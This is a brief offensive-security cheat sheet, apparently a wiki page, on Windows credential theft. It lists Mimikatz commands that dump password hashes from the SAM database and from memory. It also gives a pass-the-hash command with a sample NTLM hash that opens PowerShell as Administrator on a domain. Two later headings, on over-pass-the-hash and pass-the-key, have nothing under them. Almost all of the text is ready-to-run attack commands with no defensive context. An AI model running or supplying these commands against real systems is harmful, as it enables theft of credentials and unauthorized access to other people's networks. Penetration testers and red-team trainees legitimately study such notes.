Hashes
Dump Hashes
1st way
Dump Hashes from Sam file
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam""exit"'2nd way
dump MSV credentials from memory
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::msv""exit"'Pass-the-Hash
sekurlsa::pth /user:**Administrator** /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:pdc /run:powershell.exe
# replace with target userOver Pass The Hash
Pass-the-Key
Last updated